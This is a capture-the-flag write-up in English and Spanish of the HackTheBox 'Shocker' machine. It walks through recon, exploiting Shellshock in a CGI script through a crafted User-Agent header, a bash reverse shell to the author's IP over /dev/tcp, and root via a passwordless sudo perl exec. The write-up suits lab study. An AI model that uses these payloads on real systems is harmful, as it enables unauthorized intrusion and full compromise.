# Shocker

Shocker is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/Shocker), created by mrb3n. In the current writeup, my IP is 10.10.14.210, and the target IP is 10.129.37.21

## Recon

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

{% code title="Local Terminal" %}

```bash
ping -c 1 10.129.37.21
```

{% endcode %}

```bash
Haciendo ping a 10.129.37.21 con 32 bytes de datos:
Respuesta desde 10.129.37.21: bytes=32 tiempo=628ms TTL=63
Respuesta desde 10.129.37.21: bytes=32 tiempo=165ms TTL=63

Estadísticas de ping para 10.129.37.21:
    Paquetes: enviados = 2, recibidos = 2, perdidos = 0
    (0% perdidos),
```

By the TTL, we can assume that is a Linux Machine, because it's close to 63.

{% code title="Local Terminal" %}

```bash
nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.37.21
```

{% endcode %}

```bash
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE      REASON
80/tcp   open  http         syn-ack ttl 62
2222/tcp open  EtherNetIP-1 syn-ack ttl 62

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.62 seconds
           Raw packets sent: 78689 (3.462MB) | Rcvd: 76654 (3.066MB)
```

And then we try to get the version and run basic scripts with Nmap in each port.

{% code title="Local Terminal" overflow="wrap" %}

```bash
nmap -sCV -p 80,2222 10.129.37.21
```

{% endcode %}

```bash
Nmap scan report for 10.129.37.21
Host is up (0.16s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.29 seconds
```

Se encontraron dos puertos relevantes, el puerto 80, donde se hostea el servicio web objetivo, y el puerto ssh que esta ubicado en el puerto 2222.

Como detalle, si buscas en Google "OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 launchpad", encontraras el tipo de build que utiliza, en este caso es un Ubuntu Xenial. Si ingresamos a la maquina y comprobamos que es el mismo, se puede suponer que no es un contenedor

{% code title="Local Terminal" overflow="wrap" %}

```bash
whatweb http://10.129.37.21:80
```

{% endcode %}

{% code overflow="wrap" %}

```bash
http://10.129.37.21:80 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.37.21]
```

{% endcode %}

A simple vista, no hay nada importante, veamos el sitio web directamente

## Web Exploring

At the source-code, there is absolutely nothing... let's fuzz it!

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FAyYC90wvgHU8pjBjYsUP%2Fimage.png?alt=media&#x26;token=1464aba8-df0f-45d9-bfd6-8bd6717a7343" alt=""><figcaption></figcaption></figure>

{% code title="Local Terminal" %}

```bash
python3 dirsearch.py -u http://10.129.37.21/ -e php,html,js --crawl
```

{% endcode %}

```bash
Extensions: php, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 10625

Output: /shared/github/dirsearch/reports/http_10.129.37.21/__24-08-27_21-13-29.txt

Target: http://10.129.37.21/

[21:13:29] Starting:
[21:15:15] 403 -  295B  - /cgi-bin/
[21:17:06] 403 -  300B  - /server-status
[21:17:06] 403 -  301B  - /server-status/
```

{% code title="Local Terminal" %}

```bash
python3 dirsearch.py -u http://10.129.37.21/cgi-bin/ --crawl -e html,php,js,sh,cgi,pl
```

{% endcode %}

```bash
Extensions: php, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 10625

Output: /shared/github/dirsearch/reports/http_10.129.37.21/__24-08-27_21-13-29.txt

Target: http://10.129.37.21/

[21:13:29] Starting:
[21:15:15] 403 -  295B  - /cgi-bin/
[21:17:06] 403 -  300B  - /server-status
[21:17:06] 403 -  301B  - /server-status/
```

Al parecer hay varios paths extraños, pero al ingresar, el más curioso es `/cgi-bin/user.sh`, que al ingresar, descargas un archivo.

## Exploit CGI-based web server

{% code title="Local Terminal" %}

```bash
cat user.sh
```

{% endcode %}

```bash
Content-Type: text/plain

Just an uptime test script

 17:21:40 up  3:50,  0 users,  load average: 0.00, 0.00, 0.00
```

Fragmento de un request? Al parecer es un mal manejo del navegador... la alternativa seria ver que ve Burpsuite al enviar una peticion al mismo lugar.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FNWo2nXrVchbR3TdSUgC7%2Fimage.png?alt=media&#x26;token=0a91bcef-4c75-41fd-92c3-edff9b9773d9" alt=""><figcaption></figcaption></figure>

Ahora sabemos que se descarga por el espacio que hay en la linea 8, o mostraria en texto plano tu tiempo actual, de todas formas, la informacion es la misma. Es un script que corre en bash.

### Finding

Al buscar más al respecto, se encuentra que existe una serie de vulnerabilidades tipo CGI-based Web Server que nos permitiria cambiar el comando que esta ejecutando el script simple y realizar un RCE. Para explotarlo, tienes que cambiar en Burpsuite el User-Agent a lo siguiente:

{% embed url="<https://en.wikipedia.org/wiki/Shellshock_(software_bug)>" %}

Al buscar más al respecto, se encuentra que existe una serie de vulnerabilidades tipo CGI-based Web Server que nos permitiria cambiar el comando que esta ejecutando el script simple y realizar un RCE. Para comprobar su existencia, nmap tiene un script que detectara si es vulnerable o no.

{% code title="Local Terminal" %}

```bash
nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh 10.129.37.21
```

{% endcode %}

```bash
Nmap scan report for 10.129.37.21
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-shellshock:
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|
|     Disclosure date: 2014-09-24
|     References:
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|       http://seclists.org/oss-sec/2014/q3/685
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
```

Como podemos apreciar, el target si es vulnerable a Shellshock, es bueno tener presente este script ante paths que finalicen en .sh

### Exploit

Ahora para explotarlo, tienes que cambiar en Burpsuite el User-Agent a lo siguiente:

```
User-Agent: () { :;}; echo; /usr/bin/id
```

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F3aKI750jn3bhXitXQMK3%2Fimage.png?alt=media&#x26;token=c5edca90-6977-4666-8634-39ba898b47c7" alt=""><figcaption></figcaption></figure>

Funciono! Acabamos de ejecutar el comando "id", ahora solo falta ejecutar una reverse shell. Primero hay que abrir con netcat un vector y luego inyectar el codigo

{% code title="Local Terminal" %}

```bash
nc -nlvp 443
```

{% endcode %}

{% code title="Burpsuite:" %}

```
User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.210/443 0>&1
```

{% endcode %}

{% embed url="<https://app.gitbook.com/o/72N3ASFKYjtNgddXyDWM/s/NqjbvJ4m6enB6HiVWSTQ/cybersecurity/tip-and-tricks/bash-upgrade>" %}
Bash Upgrade: Para mejorar la Shell
{% endembed %}

{% code title="Shelly Terminal" %}

```bash
cat /home/shelly/user.txt
```

{% endcode %}

```bash
b716b78e5f7c694f83816d74b551603b
```

And done! We have the first flag!

## Privilege Escalation

Now we will run every basic command to get information.

{% code title="Shelly Terminal" %}

```bash
shelly@Shocker:/home/shelly$ id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/home/shelly$ whoami
shelly
shelly@Shocker:/home/shelly$ uname -a
Linux Shocker 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
shelly@Shocker:/home/shelly$ sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$
```

{% endcode %}

Como **Shelly** podemos utilizar perl sin contraseña, con esto se puede escalar con facilidad, ya que se puede ejecutar perl utilizando sudo.

{% code title="Shelly Terminal" overflow="wrap" %}

```bash
sudo perl -e 'exec "/bin/bash"'
```

{% endcode %}

{% code title="Root Terminal" %}

```bash
cat /root/root.txt
efa679e728a151b3149bd357fa6039a1
```

{% endcode %}